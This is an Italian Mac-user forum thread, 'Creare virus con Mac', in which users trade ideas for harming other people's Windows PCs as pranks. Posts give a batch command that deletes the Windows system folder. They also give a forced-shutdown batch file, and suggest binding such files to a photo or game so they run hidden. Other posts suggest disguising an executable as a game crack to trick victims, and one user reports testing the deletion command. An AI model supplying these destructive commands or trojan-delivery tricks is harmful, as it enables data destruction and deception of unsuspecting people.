Vai al contenuto

Creare virus con Mac


Messaggi raccomandati

  • Risposte 94
  • Creato
  • Ultima Risposta
Ospite maximarco88

Unisci il file a una fotografia magari.. O ad un giochino flash.

Uniti i due file quando ci clicca sopra parte il gioco ma anche il programma. Tramite @echo off la sua esecuzione viene nascosta.

Si accorgerà comunque al riavvio che non funziona più nulla.. Quando windows andrà a caricare i file di sistema e non troverà tutto il necessario.

Link al commento
Condividi su altri siti

se cerchi qualcosa di innocuo (ma meno "divertente" :ghghgh:) in rete puoi trovare dei file .exe che simulano un crash del sistema per poi far uscire una scritta del tipo "te la sei fatta sotto eh?"

Ma che bisogno c'è? windows io credevo che crashasse anche da solo :DD:rofl:

OOOOOOOOOOOOOOOOOO

OOOOOOOOOOOOOOO

OOOOOOOOOOOOOOO

OOOOOOOOOOOOOOOOOO#

Link al commento
Condividi su altri siti

Scusate io ho provato a far partire questo file (.bat) su parallels:

@echo off

del %windir%\*.*

E mi ha aperto una specie di terminale di windows con scritto sei sicuro di voler bla bla bla...? io ho scritto "si" e ha cominciato a fare dei processi ma veniva fuori tutto impossibile e alla fine non è successo nulla...

che sia perchè è parallels?

L'@echo off non dovrebbe evitare che mi chieda se sono sicuro di volere eseguire il file??

NUOVO UTENTE MAC?

Leggi questo topic, ti sarà utile.

Link al commento
Condividi su altri siti

ho preso giusto due appunti....

mi sa che potrei divertirmi un pò....:ciao::fastidioso::mhh::fastidioso::mhh::lol::jason::devil::mitra::devil::oops::P:devil:

La vita è una tempesta, prendersela nel culo un lampo...NO WAR

Fantozzi, lei è una Merdaccia!!

Link al commento
Condividi su altri siti

C'è ancora chi apre i .bat?

Comunque, cancellargli tutto addirittura?

Al limite fai un bat del tipo :

@echo off

shutdown -f -s -t 120 -c "Comprati un Mac!"

Così gli spegni solo il PC, un pò quello che faceva un worm che girava qualche anno fa.

Ma quando una lunga serie di abusi e usurpazioni, volti a perseguire il medesimo obbiettivo, rivela il disegno di riunire tutti gli uomini all'assolutismo, è loro diritto e loro dovere rovesciare un sì fatto governo e provvedere alla sicurezza per l'avvenire.

Link al commento
Condividi su altri siti

Se vuoi creare, modificare un file in exe ti serve un compilatore.

Al limite potresti fare un bat che richiama un exe già esistente, ma sono comunque applicazioni obsolete che aprono davvero le persone che non ne sanno assolutamente nulla.

Queste cose son morte dal Windows 98 a salire....

La figata colossale sarebbe inventarti una applicazione banale (quindi comunque compilata) con estenzione exe (o magari con finestre banalissime).

Ne trovi esempi a bizzeffe sul web e spacciarlo per l'ultimo crack o patch di Call of Duty 4.

Ricordo quando lo feci all'università....

Dio che ridere...

Ma quando una lunga serie di abusi e usurpazioni, volti a perseguire il medesimo obbiettivo, rivela il disegno di riunire tutti gli uomini all'assolutismo, è loro diritto e loro dovere rovesciare un sì fatto governo e provvedere alla sicurezza per l'avvenire.

Link al commento
Condividi su altri siti

Se vuoi creare, modificare un file in exe ti serve un compilatore.

Al limite potresti fare un bat che richiama un exe già esistente, ma sono comunque applicazioni obsolete che aprono davvero le persone che non ne sanno assolutamente nulla.

Queste cose son morte dal Windows 98 a salire....

La figata colossale sarebbe inventarti una applicazione banale (quindi comunque compilata) con estenzione exe (o magari con finestre banalissime).

Ne trovi esempi a bizzeffe sul web e spacciarlo per l'ultimo crack o patch di Call of Duty 4.

Ricordo quando lo feci all'università....

Dio che ridere...

Queso in verità che effetto fa?

@echo off
shutdown -f -s -t 120 -c "Comprati un Mac!"

Visto che c'è scritto "Comprati un Mac"... oltre a spegnere il computer fa comparire anche un messaggio?

PS: Per fare i files ".com" devo compilarlo? o basta TextEdit?

OOOOOOOOOOOOOOOOOO

OOOOOOOOOOOOOOO

OOOOOOOOOOOOOOO

OOOOOOOOOOOOOOOOOO#

Link al commento
Condividi su altri siti

Non c'è bisogno di creare virus!

Tempo sprecato...

Visita questo sito: www.scherzettoni.com e troverai tantissimi scherzi anche pesanti, tutto quello che vuoi :)

Io avevo inviato ad un mio amico uno scherzo che gli faceva apparire centinaia di piccole scimmie sullo schermo che piano piano lo ricoprivano di ehm...cacca, facendo diventare lo schermo tutto nero. (o meglio marrone :ghghgh:)

Due giorni dopo gli ho inviato via sms il modo per sbloccarlo.

Credo che immaginiate la sua risposta :ghghgh:

Come il principe dei nembi è il Poeta che, avvezzo alla tempesta, si ride dell'arciere ma esiliato sulla terra, fra scherni, camminare non può per le sue ali di gigante.

Link al commento
Condividi su altri siti

Questo qui fa apparire una finestra che dice che il computer si spegnerà fra 2 minuti e fa apparire il messaggio "Comprati un Mac!"

Basta text edit usando la modalità testo semplice. I file sono .bat, non .com!

io chiedevo come si potessero fare files .com... :ghghgh:

OOOOOOOOOOOOOOOOOO

OOOOOOOOOOOOOOO

OOOOOOOOOOOOOOO

OOOOOOOOOOOOOOOOOO#

Link al commento
Condividi su altri siti

Per fare i files ".com" devo compilarlo? o basta TextEdit?

Questo non lo so :ciao:

Ma quando una lunga serie di abusi e usurpazioni, volti a perseguire il medesimo obbiettivo, rivela il disegno di riunire tutti gli uomini all'assolutismo, è loro diritto e loro dovere rovesciare un sì fatto governo e provvedere alla sicurezza per l'avvenire.

Link al commento
Condividi su altri siti

  • 2 settimane dopo...

Apparte che se vuoi fare scherzi è inutile che perdi tempo, poi dovresti compilarli e se vuoi renderli più credibili trasformarli in .exe.

Se vuoi ti do le istruzioni per farli con windows, così riesco a compilarli e renderlie seguibili.



IOO 2.0

Link al commento
Condividi su altri siti

Archiviato

Questa discussione è archiviata e chiusa a future risposte.


×
×
  • Crea Nuovo...